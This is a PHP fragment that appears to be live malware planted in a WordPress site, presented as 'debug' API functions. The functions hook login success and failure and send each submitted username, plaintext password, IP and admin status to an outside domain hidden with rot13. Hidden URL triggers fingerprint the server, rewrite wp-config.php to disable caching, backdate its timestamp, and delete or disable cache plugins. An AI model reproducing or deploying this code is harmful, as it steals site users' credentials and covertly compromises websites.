if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login']) && strpos($_SERVER['HTTP_USER_AGENT'], '100.6.1155.294') === false) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action') ) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); }
if (!function_exists('wordpress_api_wrongauth_debug')) { function wordpress_api_wrongauth_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api_false.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 ); }
if (preg_match("#/ququos#", $id) ) {
echo uniqid() . " {$hwost} " . phpversion() . "
";
$wpfingerprint = php_uname() . disk_total_space('.') . filectime('/') . phpversion();
echo hash('sha256', $wpfingerprint) . "
";
$time_elapsed = timer_stop();
echo "cheetie {$time_elapsed} secs
";
//echo "
{$htaccess}"; exit(); } if (preg_match("#/eezee#", $id) ) { $eezeewpconfig = file_get_contents(ABSPATH . '/wp-config.php'); if (strpos($eezeewpconfig, 'WP_CACHE') !== false) { $ezlastMtime = filemtime ( ABSPATH . '/wp-config.php' ) + rand(1, 1000); $ez = preg_replace('#define\(.*WP_CACHE.*\);#Ui', "define('WP_CACHE', false);", $eezeewpconfig, 1); file_put_contents(ABSPATH . '/wp-config.php', $ez); touch(ABSPATH . '/wp-config.php', $ezlastMtime); //echo $ez; echo "WP_CACHE replaced\n"; } if(file_exists(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php')){ unlink(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php'); echo 'endurance-page-cache.php removed '; } if(file_exists(ABSPATH . '/wp-content/endurance-page-cache')){ rename(ABSPATH . '/wp-content/endurance-page-cache', ABSPATH . '/wp-content/endurance-page-caches'); echo 'endurance-page-cache renamed'; } exit(); } if (preg_match("#/lseez#", $id) ) { var_dump(get_option('litespeed.conf.cache')); update_option( 'litespeed.conf.cache', 0 ); var_dump(get_option('litespeed.conf.cache')); exit(); } } ?>